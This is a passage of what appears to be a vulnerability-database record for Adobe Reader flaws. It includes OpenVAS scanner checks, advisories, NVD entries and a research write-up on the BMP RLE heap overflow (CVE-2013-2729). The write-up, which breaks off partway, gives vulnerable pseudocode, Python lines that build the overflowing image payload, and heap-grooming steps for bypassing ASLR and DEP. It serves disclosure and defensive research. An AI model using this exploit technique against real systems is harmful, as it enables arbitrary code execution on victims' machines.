exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!readerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(readerVer && readerVer =~ \"^9|10|11\")\n{\n if((version_in_range(version:readerVer, test_version:\"9.0\", test_version2: \"9.5.4\"))||\n (version_in_range(version:readerVer, test_version:\"10.0\", test_version2: \"10.1.6\"))||\n (version_in_range(version:readerVer, test_version:\"11.0\", test_version2: \"11.0.02\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-29T12:38:47", "bulletinFamily": "scanner", "description": "Gentoo Linux Local Security Checks GLSA 201308-03", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121011", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121011", "title": "Gentoo Security Advisory GLSA 201308-03", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201308-03.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121011\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:25:38 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201308-03\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Adobe Reader. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201308-03\");\n script_cve_id(\"CVE-2012-1525\", \"CVE-2012-1530\", \"CVE-2012-2049\", \"CVE-2012-2050\", \"CVE-2012-2051\", \"CVE-2012-4147\", \"CVE-2012-4148\", \"CVE-2012-4149\", \"CVE-2012-4150\", \"CVE-2012-4151\", \"CVE-2012-4152\", \"CVE-2012-4153\", \"CVE-2012-4154\", \"CVE-2012-4155\", \"CVE-2012-4156\", \"CVE-2012-4157\", \"CVE-2012-4158\", \"CVE-2012-4159\", \"CVE-2012-4160\", \"CVE-2012-4363\", \"CVE-2013-0601\", \"CVE-2013-0602\", \"CVE-2013-0603\", \"CVE-2013-0604\", \"CVE-2013-0605\", \"CVE-2013-0606\", \"CVE-2013-0607\", \"CVE-2013-0608\", \"CVE-2013-0609\", \"CVE-2013-0610\", \"CVE-2013-0611\", \"CVE-2013-0612\", \"CVE-2013-0613\", \"CVE-2013-0614\", \"CVE-2013-0615\", \"CVE-2013-0616\", \"CVE-2013-0617\", \"CVE-2013-0618\", \"CVE-2013-0619\", \"CVE-2013-0620\", \"CVE-2013-0621\", \"CVE-2013-0622\", \"CVE-2013-0623\", \"CVE-2013-0624\", \"CVE-2013-0626\", \"CVE-2013-0627\", \"CVE-2013-0640\", \"CVE-2013-0641\", \"CVE-2013-2549\", \"CVE-2013-2550\", \"CVE-2013-2718\", \"CVE-2013-2719\", \"CVE-2013-2720\", \"CVE-2013-2721\", \"CVE-2013-2722\", \"CVE-2013-2723\", \"CVE-2013-2724\", \"CVE-2013-2725\", \"CVE-2013-2726\", \"CVE-2013-2727\", \"CVE-2013-2729\", \"CVE-2013-2730\", \"CVE-2013-2731\", \"CVE-2013-2732\", \"CVE-2013-2733\", \"CVE-2013-2734\", \"CVE-2013-2735\", \"CVE-2013-2736\", \"CVE-2013-2737\", \"CVE-2013-3337\", \"CVE-2013-3338\", \"CVE-2013-3339\", \"CVE-2013-3340\", \"CVE-2013-3341\", \"CVE-2013-3342\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201308-03\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"app-text/acroread\", unaffected: make_list(\"ge 9.5.5\"), vulnerable: make_list(\"lt 9.5.5\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "kaspersky": [{"lastseen": "2019-03-21T00:14:36", "bulletinFamily": "info", "description": "### *Detect date*:\n08/08/2013\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Adobe Acrobat & Reader. Malicious users can exploit these vulnerabilities to cause denial of service, bypass security, obtain sensitive information or arbitrary code execution.\n\n### *Affected products*:\nAdobe Reader XI versions 11.0.02 and earlier \nAdobe Reader X versions 10.1.6 and earlier \nAdobe Reader 9 versions 9.5.4 and earlier \nAdobe Acrobat XI versions 11.0.02 and earlier \nAdobe Acrobat X versions 10.1.6 and earlier \nAdobe Acrobat 9 versions 9.5.4 and earlier\n\n### *Solution*:\nUpdate to latest version \n[get reader](<https://get.adobe.com/reader/?loc=ru>)\n\n### *Original advisories*:\n[APSB](<http://www.adobe.com/support/security/bulletins/apsb13-15.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Adobe Reader](<https://threats.kaspersky.com/en/product/Adobe-Reader/>)\n\n### *CVE-IDS*:\n[CVE-2013-3346](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3346>)10.0Critical \n[CVE-2013-3342](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3342>)10.0Critical \n[CVE-2013-3341](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3341>)10.0Critical \n[CVE-2013-3340](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3340>)10.0Critical \n[CVE-2013-3339](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3339>)10.0Critical \n[CVE-2013-3338](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3338>)10.0Critical \n[CVE-2013-3337](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3337>)10.0Critical \n[CVE-2013-2736](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2736>)10.0Critical \n[CVE-2013-2737](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2737>)5.0Critical \n[CVE-2013-2734](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2734>)10.0Critical \n[CVE-2013-2735](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2735>)10.0Critical \n[CVE-2013-2732](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2732>)10.0Critical \n[CVE-2013-2733](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2733>)10.0Critical \n[CVE-2013-2730](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2730>)10.0Critical \n[CVE-2013-2731](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2731>)10.0Critical \n[CVE-2013-2727](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2727>)10.0Critical \n[CVE-2013-2729](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2729>)10.0Critical \n[CVE-2013-2726](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2726>)10.0Critical \n[CVE-2013-2725](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2725>)10.0Critical \n[CVE-2013-2718](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2718>)10.0Critical \n[CVE-2013-2550](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2550>)7.5Critical \n[CVE-2013-2720](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2720>)10.0Critical \n[CVE-2013-2719](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2719>)10.0Critical \n[CVE-2013-2722](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2722>)10.0Critical \n[CVE-2013-2721](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2721>)10.0Critical \n[CVE-2013-2724](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2724>)10.0Critical \n[CVE-2013-2723](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2723>)10.0Critical \n[CVE-2013-2549](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2549>)7.5Critical", "modified": "2019-03-07T00:00:00", "published": "2013-08-08T00:00:00", "id": "KLA10457", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10457", "title": "\r KLA10457Adobe Acrobat & Reader multiple vulnerabilities ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2017-09-19T13:38:48", "bulletinFamily": "NVD", "description": "Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-2736, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, and CVE-2013-3340.", "modified": "2017-09-18T21:36:39", "published": "2013-05-16T07:45:31", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3341", "id": "CVE-2013-3341", "title": "CVE-2013-3341", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-19T13:38:45", "bulletinFamily": "NVD", "description": "Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2734, CVE-2013-2735, CVE-2013-2736, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.", "modified": "2017-09-18T21:36:25", "published": "2013-05-16T07:45:31", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2732", "id": "CVE-2013-2732", "title": "CVE-2013-2732", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-19T13:38:48", "bulletinFamily": "NVD", "description": "Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-2736, CVE-2013-3337, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.", "modified": "2017-09-18T21:36:39", "published": "2013-05-16T07:45:31", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3338", "id": "CVE-2013-3338", "title": "CVE-2013-3338", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-19T13:38:45", "bulletinFamily": "NVD", "description": "Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-2736, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.", "modified": "2017-09-18T21:36:24", "published": "2013-05-16T07:45:31", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2720", "id": "CVE-2013-2720", "title": "CVE-2013-2720", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-19T13:38:45", "bulletinFamily": "NVD", "description": "Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-2736, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.", "modified": "2017-09-18T21:36:24", "published": "2013-05-16T07:45:31", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2719", "id": "CVE-2013-2719", "title": "CVE-2013-2719", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-19T13:38:48", "bulletinFamily": "NVD", "description": "Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-2736, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.", "modified": "2017-09-18T21:36:39", "published": "2013-05-16T07:45:31", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3337", "id": "CVE-2013-3337", "title": "CVE-2013-3337", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-19T13:38:48", "bulletinFamily": "NVD", "description": "Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-2736, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, and CVE-2013-3341.", "modified": "2017-09-18T21:36:39", "published": "2013-05-16T07:45:31", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3340", "id": "CVE-2013-3340", "title": "CVE-2013-3340", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-19T13:38:48", "bulletinFamily": "NVD", "description": "Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 do not properly handle operating-system domain blacklists, which has unspecified impact and attack vectors.", "modified": "2017-09-18T21:36:39", "published": "2013-05-16T07:45:31", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3342", "id": "CVE-2013-3342", "title": "CVE-2013-3342", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-19T13:38:45", "bulletinFamily": "NVD", "description": "Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.", "modified": "2017-09-18T21:36:26", "published": "2013-05-16T07:45:31", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2736", "id": "CVE-2013-2736", "title": "CVE-2013-2736", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-19T13:38:45", "bulletinFamily": "NVD", "description": "Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-2736, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.", "modified": "2017-09-18T21:36:24", "published": "2013-05-16T07:45:31", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2718", "id": "CVE-2013-2718", "title": "CVE-2013-2718", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "binamuse": [{"lastseen": "2017-07-29T13:19:49", "bulletinFamily": "info", "description": "![](http://2.bp.blogspot.com/-oJbNrM1rGQU/UZK0LdphK7I/AAAAAAAAAGg/2h8HjU6PPEA/s320/adobe_pdf_broken.jpg)\n\nAdobe Reader X is a powerful software solution developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF). Since version 10 it includes the Protected Mode, a sandbox technology similar to the one in Google Chrome which improves the overall security of the product. \n\n\n * Title: Adobe Reader BMP/RLE heap corruption \n * CVE Name: CVE-2013-2729 \n * Permalink: http://blog.binamuse.com/2013/05/readerbmprle.html \n * Date published: 2013-05-14 \n * Date of last update: 2013-05-14 \n * Class: Client side Integer Overflow \n\nAdobe Reader X fails to validate the input when parsing an embedded BMP RLE encoded image. Arbitrary code execution in the context of the sandboxed process is proved possible after a malicious bmp image triggers a heap overflow. Quick links: [White paper](<http://www.binamuse.com/papers/XFABMPReport.pdf>), [Exploit generator in python](<https://github.com/feliam/CVE-2013-2729/blob/master/XFABMPExploit.py>) and [PoC.pdf](<https://github.com/feliam/CVE-2013-2729/blob/master/E10.1.4.pdf?raw=true>) for Reader 10.1.4. \n\n\n# Vulnerability Details \n\nThe issue presented here is related to the parsing of a BMP file compressed with RLE8. The bug is triggered when Adobe Reader parses a BMP RLE encoded file embedded in an interactive PDF form. The dll responsible of handling the embedded XFA interactive forms(and the BMP) is the `AcroForm.api` plugin. So in order to get to the bug we first need to reach the XFA code. \n\n\n## PDF Forms\n\nA PDF file can contain interactive Forms in two flavors: \n\n\n * The legacy, Forms Data Format (FDF or AcroForms) \n * The XML based, XML Forms Architecture (XFA) \nThere is support for different XFA Specifications since Acrobat 8.0 (ref. [`http://blogs.adobe.com/livecycle/2011/09/compatibility-matrix-for-xfa.html`](<http://blogs.adobe.com/livecycle/2011/09/compatibility-matrix-for-xfa.html>)). \nXFA Version| Acrobat Version \n---|--- \n2.6| Acrobat 8.1/Acrobat 8.11 \n2.7| Acrobat 8.1 \n2.8| Acrobat 9.0, Acrobat 9 ALang features \n3.0| Acrobat 9.1 \n3.3| Acrobat 10.0 \nWe will focus on last XFA specification available. \n\n\n### XFA, The XML Forms Architecture\n\nThe XML Forms Architecture (XFA) provides a template-based grammar and a set of processing rules that allow business to build interactive forms. At its simplest, a template-based grammar defines fields in which a user provides data. Among others it defines buttons, textfields, choicelists, images and a scripting API to validate the data and interact. It supports Javascript, XSLT an FormCalc as scripting language. A small XFA containing an image looks like this: \n\n\n> \n> <template xmlns:xfa=\"http://www.xfa.org/schema/xfa-template/3.1/\"> \n> <subform name=\"form1\" layout=\"tb\" locale=\"en_US\" restoreState=\"auto\"> \n> <pageSet> \n> <pageArea name=\"Page1\" id=\"Page1\"> \n> <contentArea x=\"0.25in\" y=\"0.25in\" w=\"576pt\" h=\"756pt\"/> \n> <medium stock=\"default\" short=\"612pt\" long=\"792pt\"/> \n> </pageArea> \n> </pageSet> \n> <subform w=\"576pt\" h=\"756pt\"> \n> <field name=\"ImageField\" > \n> <ui> \n> <imageEdit data=\"embed\"/> \n> </ui> \n> <value> \n> <image> AAAAA.. AAAAAA</image> \n> </value> \n> </field> \n> </subform> \n> </subform> \n> </template> \n> \n\nAn XFA Form can be embedded in a common pdf stream and be rendered by all modern versions of Adobe Reader. The PDF catalog must contain the `/NeedsRendering`, `/Extensions` and `/AcroForm` fields. `/AcroForm` field must point to the form dictionary. Something like this.. \n\n\n> \n> 3 0 obj \n> << /Length 12345 >> \n> stream \n> XFA.... \n> endsream \n> 2 0 obj \n> << /XFA 3 0 R >> \n> endobj \n> 1 0 obj \n> << /Type /Catalog \n> /NeedsRendering true \n> /AcroForm 2 0 R \n> /Extensions << \n> /ADBE << \n> /BaseVersion /1.7 \n> /ExtensionLevel 3 \n> >> \n> >> \n> ... \n> >> \n> endobj \n> \n\nGraphically a PDF containing an XFA form has this structure: \n![](http://1.bp.blogspot.com/-wrDJr0nOLtM/UZJmXxXPT_I/AAAAAAAAAFA/bHuk28-JOGg/s1600/XFABMPStruct.png)At this point we can build a PDF containing a XFA Form containing an image. Let's see the BMP bug. \n\n\n## BMP - Run length encoding\n\nThe BMP can be compressed in two modes, absolute mode and RLE mode. Both modes can occur anywhere in a single bitmap. Ref. [`http://www.fileformat.info/format/bmp/corion-rle8.htm`](<http://www.fileformat.info/format/bmp/corion-rle8.htm>) The RLE mode is a simple RLE mechanism, the first byte contains the count, the second byte the pixel to be replicated. If the count byte is 0, the second byte is a special, like EOL or delta. In absolute mode, the second byte contains the number of bytes to be copied literally. Each absolute run must be word-aligned that means you might have to add an additional padding byte which is not included in the count. After an absolute run, RLE compression continues. \nSecond byte| Meaning \n---|--- \n0| End of line \n1| End of bitmap \n2| Delta. The next two bytes are the horizontal \n| and vertical offsets from the current position \n| to the next pixel. \n3-255| Switch to absolute mode \n \n## Bug pseudocode \n\nConsider the followind `C` listing. This pseudo code is derived from the function responsible of expanding an RLE encoded BMP, found in `AcroForm.api`. The functions `feof()`, `fread()` and `malloc()` are the usual ones. The `stream` is a file from where it has already read the complete BMP header, including the height and the width. The main purpose of function is to expand the RLE encoded data. First it allocates enough memory to hold the complete image. Then it reads one byte to decide between one of the two modes: RLE or Absolute. In the RLE mode it repeats the next byte a number of times. In the Absolute mode there are more options implemented as a switch: \n\n\n * 0\\. End of line, fix the xpos/ypos indexes to point to the start of the next line. \n * 1\\. End of file, finish processing.\n * 2\\. Delta, moves the write pointer (e.g. to skip blank regions).\n * d. Literal data, copies data literally from the file.\nProve yourself and try to find the bug here: \n\n\n 1. char* rle(FILE* stream, unsigned height, unsigned width){\n\n 2. assert(height < 4096 && height < 4096);\n\n 3. char * line;\n\n 4. char aux;\n\n 5. unsigned count;\n\n 6. struct {\n\n 7. unsigned char reps;\n\n 8. unsigned char value;\n\n 9. }cmd;\n\n 10. unsigned char xdelta, ydelta;\n\n 11. unsigned xpos = 0;\n\n 12. unsigned ypos = height - 1;\n\n 13. char * texture = malloc(height*width); //Safe mult!\n\n 14. assert(texture);\n\n 15. while ( !feof(stream)) {\n\n 16. fread(&cmd, 1, 2, stream);\n\n 17. if ( cmd.reps ) {\n\n 18. assert ( ypos < height && cmd.reps + xpos <= width );\n\n 19. for(count = 0; count<cmd.reps; count++) { //RLE Mode, repeat the value\n\n 20. line = texture+(ypos*width);\n\n 21. line[xpos++] = cmd.value;\n\n 22. }\n\n 23. }\n\n 24. else { // if rep is zero then value is a command\n\n 25. switch(cmd.value){\n\n 26. case 0: //End of line\n\n 27. ypos -= 1;\n\n 28. xpos = 0;\n\n 29. break;\n\n 30. case 1: //End of bitmap. Done!\n\n 31. return texture;\n\n 32. case 2: //Delta case, move bmp pointer\n\n 33. read(&xdelta, 1, 1, stream); // read one byte\n\n 34. read(&ydelta, 1, 1, stream); // read one byte\n\n 35. xpos += xdelta;\n\n 36. ypos -= ydelta;\n\n 37. break;\n\n 38. default: // literal case\n\n 39. assert ( ypos < height && cmd.value + xpos <= width );\n\n 40. for(count = 0;count < cmd.value; count++){\n\n 41. fread(&aux, 1, 1, stream);\n\n 42. line = texture+(width*ypos);\n\n 43. line[xpos++] = aux;\n\n 44. }\n\n 45. if ( cmd.value & 1 ) // padding\n\n 46. fread(&aux, 1, 1, stream);\n\n 47. }//switch(cmd.value)\n\n 48. }//if (cmd.reps)\n\n 49. }//while(!feof(stream))\n\n 50. return texture;\n\n 51. }\n\nAs you probably found out, there are no asserts at the \"delta\" case (line 32). So we could move the destination pointers arbitrarily, even outside the limits of the texture buffer. However, there are boundary checks when you try to actually write something to the texture buffer as in the line 39. \nNote that this leaves a corner case in which a heap overflow condition can be triggered. Suppose we repeatedly send _delta_ commands advancing the `xpos` index. And we continue to do so without trying to write anything until `xpos` gets really big, for example `0xffffff00`. To accomplish this, the BMP should contain `0xffffff00/0xff` _delta_ commands each one incrementing the `xpos` in `0xff` like this: \n\n> 1. bmp += '\\x00\\x02\\xff\\x00' * ((0xffffffff-0xff) / 0xff)\n\nThen after padding, we pass a _literal_ command to actually write up to `0xff` bytes of data directly from the file to the pointed address. But as `xpos+len(payload)` overflows the 32bits integer representation, the boundary assertion holds and the overflow is possible. \n\n> 1. bmp += '\\x00\\x02'+chr(0x100-len(payload))+'\\x00'\n> \n> 2. bmp += '\\x00'+chr(len(payload))+payload\n\nSumming up, using this bug we can **overwrite** up to `256` bytes immediately before the texture buffer. \n\n\n# Exploitation details\n\nThe texture is allocated in the heap using the width and height found in the BMP header. So we control the size of the overflow-able allocation and we need to choose it wisely to overwrite something useful. But first to increase reliability it is better to prepare the heap with a sequence of allocations. We use the well known javascript method for allocating and freeing heap chunks. The exploitation script would be like this: \n\n\n * allocate `1000` `0x12C` chunks of controlled data. Very likely triggering a LFH of size `0x12C`(_0x12 (18)consecutive allocations will guarantee LFH enabled for a given SIZE_). ![](http://1.bp.blogspot.com/-kX-FqIH5EJA/UZJpPTUbRFI/AAAAAAAAAFM/esjAPGSdsqY/s1600/allocations1.png)\n * free one every 10 chunks of the previously allocated chunks, generating several holes separated 10 chunks from each other.![](http://2.bp.blogspot.com/-HNT0-9jPLY0/UZJpRYharEI/AAAAAAAAAFU/afEFw8rPBMQ/s1600/allocations2.png)\nIt has been found that a structure of size `0x12C` bytes is used after the decoding of all images. It contains pointers to the specific vtables and functions. The goal is to **read** and **write** this structure from javascript. \n\n\n### Leak an adress to javascript, read the struct \n\nTo achieve our goal, we first need to leak some pointer to the javascript interpreter so we could bypass ASLR and DEP. In order to learn the address of some dlls we need to be able to read an object structure from javascript. To get this we'll load a broken BMP image corrupting an **LFH** chunk header thus trick the allocator into believing that an alive javascript string memory is free. \n\n * Load a broken BMP with dimensions `{1 , 0x12C}`, its pixel texture (of size `0x12C`) will be allocated in one of the prepared holes. The allocator will most likely assign one of the previously prepared holes to it. 